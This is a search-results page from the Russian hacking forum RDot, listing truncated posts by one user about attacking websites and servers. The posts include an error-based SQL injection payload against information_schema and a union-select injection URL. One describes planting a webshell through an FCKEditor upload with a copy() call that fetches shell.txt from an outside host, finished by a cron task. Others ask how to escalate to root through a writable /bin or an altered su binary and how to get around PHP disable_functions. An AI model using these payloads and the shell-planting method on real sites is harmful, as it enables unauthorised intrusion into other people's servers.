Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 202.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: nomad
Раздел: Web-среда/Web-applications 06.07.2016, 07:04
Ответов: 3,618
Просмотров: 2,167,394
Автор nomad
Есть фильтр на наличие в запросе...

Есть фильтр на наличие в запросе information_schema. Угадать названия таблиц не получается (префикс или еще какие-то фильтры?). Без использования information_schema узнать названия таблиц/колонок...
Раздел: Повышение привилегий/Privilege escalation 16.06.2016, 16:45
Ответов: 1,219
Просмотров: 689,065
Автор nomad
ls -al /bin/su -rwxr-xr-x 1 www-data root 36816...

ls -al /bin/su
-rwxr-xr-x 1 www-data root 36816 May 26 2012 /bin/su
Какой-то странный бинарник, в смысле его владелец. Кто-то уже поменял его до меня? Что я могу сделать, чтобы получить рут? Где...
Раздел: Повышение привилегий/Privilege escalation 16.06.2016, 06:54
Ответов: 1,219
Просмотров: 689,065
Автор nomad
Есть сервер uname -a Linux servername...

Есть сервер
uname -a
Linux servername 3.2.0-4-amd64 #1 SMP Debian 3.2.73-2+deb7u3 x86_64 GNU/Linux

cat /etc/issue
Debian GNU/Linux 8 \n \l

Директория bin доступна на запись. Как-то можно...
Раздел: Web-среда/Web-applications 01.06.2016, 18:15
Ответов: 3,618
Просмотров: 2,167,394
Автор nomad
Я вот не понимаю: судя по ответу - обычный sql...

Я вот не понимаю: судя по ответу - обычный sql запрос без всяких подзапросов и прочих извратов.
SELECT * FROM table_name WHERE id=91005
Через order by подбираю количество стобцов - один (Unknown...
Раздел: Web-среда/Web-applications 01.06.2016, 16:59
Ответов: 3,618
Просмотров: 2,167,394
Автор nomad
Есть инъекция error based + file_priv у текущего...

Есть инъекция error based + file_priv у текущего юзера.
Запрос
+and+(select+1+from+(select+count(0), concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
вывод...
Раздел: Оффтоп/Offtopic 12.02.2016, 11:25
Ответов: 2
Просмотров: 4,961
Автор nomad
Shellorg

В ходе изучения пхп, написал небольшой органайзер шеллов. Ранее использовал обычный экселевский файл, но это как-то не комильфо. Функционал пока небольшой:
- список шеллов
- комментарии к каждому...
Раздел: Web development 31.12.2015, 14:45
Ответов: 12
Просмотров: 16,494
Автор nomad
http://pastebin.com/RvVRRu5v Скрипт на пхп,...

http://pastebin.com/RvVRRu5v
Скрипт на пхп, исключительно в целях самообучения.
Веб-версия, не для командной строки, совместима с win/nix. Тестил на Денвере и VPS.
Немного не соответствует...
Раздел: Оффтоп/Offtopic 16.12.2015, 15:51
Ответов: 2
Просмотров: 4,157
Автор nomad
Зачем на пыхе? Согласен, не самый шустрый...

Зачем на пыхе? Согласен, не самый шустрый вариант. Просто в порядке изучения.
Слепок можно положить в любую папку, открытую для записи. Хоть в /tmp/
Раздел: Оффтоп/Offtopic 15.12.2015, 10:24
Ответов: 2
Просмотров: 4,157
Автор nomad
Скрипт проверки целостности файлов

В ходе изучения php написал чекер md5 сумм файлов.
Краткий faq:
- первый запуск через параметр ?create - создаем файл-слепок, где содержится основная инфа о нужных файлах (только указанные в...
Раздел: Web development 09.12.2015, 14:35
Ответов: 67
Просмотров: 56,932
Автор nomad
На одном из сайтов обнаружил такой код: ...

На одном из сайтов обнаружил такой код:

var...
Раздел: Сценарии/CMF/СMS 21.10.2015, 10:39
Ответов: 9
Просмотров: 24,075
Автор nomad
PrestaShop (1.4.9) SELECT value FROM...

PrestaShop (1.4.9)
SELECT value FROM ps_configuration WHERE name = 'PS_SHOP_DOMAIN'
Раздел: Сценарии/CMF/СMS 01.10.2015, 16:20
Ответов: 4
Просмотров: 8,822
Автор nomad
Да, разобрался с этим. Чтобы отобразить...

Да, разобрался с этим. Чтобы отобразить site.com/test.txt - нужно было создать/править в общей сложности 3 файла, а пхп файл создается без проблем и вообще без привязки к Kohana. Это криво...
Раздел: Сценарии/CMF/СMS 30.09.2015, 18:03
Ответов: 4
Просмотров: 8,822
Автор nomad
Kohana framework

Вопрос тем, кто работал с этим фреймворком. Есть сайт, нужно в корне создать обычный текстовый файл. test.txt
Создал - получаю ошибку 404. Создаю рядом php файл - все ок. Это проделки фреймоворка,...
Раздел: Форумы 29.09.2015, 23:07
Ответов: 48
Просмотров: 124,176
Автор nomad
Очень частный случай для phpbb3. При...

Очень частный случай для phpbb3. При редактировании шаблонов код вместо
<!-- PHP --> phpinfo(); <!-- ENDPHP -->
обрезался до вида
<!-- PHP -->

Решилось использованием конструкции
<script...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 08.09.2015, 15:39
Ответов: 7
Просмотров: 11,866
Автор nomad
disable_functions = addcslashes, addslashes,...

disable_functions = addcslashes, addslashes, apache_get_modules, apache_get_version, apache_getenv, apache_note, assert, base64_decode, basename, call_user_func, chdir, chmod, class_exists,...
Раздел: Сценарии/CMF/СMS 04.09.2015, 15:05
Ответов: 9
Просмотров: 24,075
Автор nomad
BigBear, тут немного другие условия: шелла нет,...

BigBear, тут немного другие условия: шелла нет, есть только доступ к пулу баз данных. А при наличии шелла да, самый простой вариант.
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 02.09.2015, 12:06
Ответов: 7
Просмотров: 11,866
Автор nomad
find / -name php.ini Во всех найденных php.ini...

find / -name php.ini
Во всех найденных php.ini - "disable_functions = "

PS

Warning: ini_get() has been disabled for security reasons in
Админ параноик...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 02.09.2015, 10:51
Ответов: 7
Просмотров: 11,866
Автор nomad
Запрет функций php

Скрипт с обычным phpinfo();
Warning: phpinfo() has been disabled for security reasons
В терминале:
php -r 'phpinfo();' >1.txt
Получаем:
disable_functions = > no value = > no value

.htaccess...
Раздел: Web-среда/Web-applications 16.08.2015, 19:14
Ответов: 3,618
Просмотров: 2,167,394
Автор nomad
NameSpace, спасибо, все решилось проще. Перед...

NameSpace, спасибо, все решилось проще. Перед тем, как забанить мой ип, система выполняла sql запрос. Страничку с его результатом перехватил с помощью httpREQ
Раздел: Web-среда/Web-applications 16.08.2015, 13:53
Ответов: 3,618
Просмотров: 2,167,394
Автор nomad
Скинул линк в ЛС. frankk, при любом...

Скинул линк в ЛС.


frankk, при любом раскладе, хоть они вместе, хоть по отдельности
Раздел: Web-среда/Web-applications 16.08.2015, 09:41
Ответов: 3,618
Просмотров: 2,167,394
Автор nomad
В кроне ничего не нашел. Еще вопрос: при...

В кроне ничего не нашел.
Еще вопрос: при запросе типа site.com/?id=1+union+select+username,2+from+users--+ идет блок на username/users, т.е. названия таблиц/колонок. Вариант с регистрами не...
Раздел: Web-среда/Web-applications 13.08.2015, 20:59
Ответов: 3,618
Просмотров: 2,167,394
Автор nomad
Сервер, Linux 2.6.31.5-127.fc12.i686.PAE, рутовые...

Сервер, Linux 2.6.31.5-127.fc12.i686.PAE, рутовые права. При внесении изменений в индексную страницу сайта через несколько секунд файл восстанавливается в своей предыдущей версии. Такое же происходит...
Раздел: Сценарии/CMF/СMS 13.07.2015, 21:10
Ответов: 75
Просмотров: 150,203
Автор nomad
instantCMS 1.9

Залил так: через FCKEditor заливаю файл с произвольным расширением (напр, 1.sss), в файле написал copy('http://mysite.com/shell.txt','/var/www/site/upload/shell.php');

В кроне создаю новую задачу,...
Раздел: Сценарии/CMF/СMS 13.07.2015, 21:08
Ответов: 10
Просмотров: 30,426
Автор nomad
Залил так: через FCKEditor заливаю файл с...

Залил так: через FCKEditor заливаю файл с произвольным расширением (напр, 1.sss), в файле написал copy('http://mysite.com/shell.txt','/var/www/site/upload/shell.php');

В кроне создаю новую задачу,...
Раздел: Сервисы, БД, Серверы/Network services, Databases, Servers 15.06.2015, 15:25
Ответов: 5
Просмотров: 10,030
Автор nomad
Есть рут, iptables выполняется (я правильно понял...

Есть рут, iptables выполняется (я правильно понял вопрос?)
IP адрес сервера по хосту = ifconfig (inet addr).
Показано с 1 по 25 из 202.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot